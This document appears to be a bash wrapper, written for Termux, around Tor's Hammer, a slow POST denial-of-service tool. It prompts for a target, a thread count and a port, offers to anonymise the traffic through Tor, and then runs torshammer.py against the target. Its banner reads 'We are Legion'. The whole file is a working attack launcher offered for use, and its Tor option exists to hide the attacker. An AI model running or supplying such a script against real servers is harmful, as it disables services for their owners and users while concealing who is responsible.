#!/data/data/com.termux/files/usr/bin/bash

echo ""
echo "/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * entropy [at] phiral.net
 * Anon-ymized via Tor
 * We are Legion.
 */"
 echo ""
 echo ""
 echo ""
 echo "Target:"
 read TARGET
 echo ""
 echo "Number of threads (Default: 256):"
 read THREADS
 echo ""
 echo "Webserver's port (Default: 80):"
 read PORT
 echo ""
 echo "Do you want to enable anonymising through tor on 127.0.0.1:9050 (y/n)?"
 read TOR
 if [ "$TOR" == "y" ]; then
	 ENABLETOR="--tor"
 else
	 ENABLETOR=""
 fi
 echo ""
 echo "Running..."
 echo ""
 python2 torshammer.py --target $TARGET --threads $THREADS --port $PORT $ENABLETOR
 echo ""
 echo "Running... Done!"
 echo ""
 read waitforexit
 exit $?
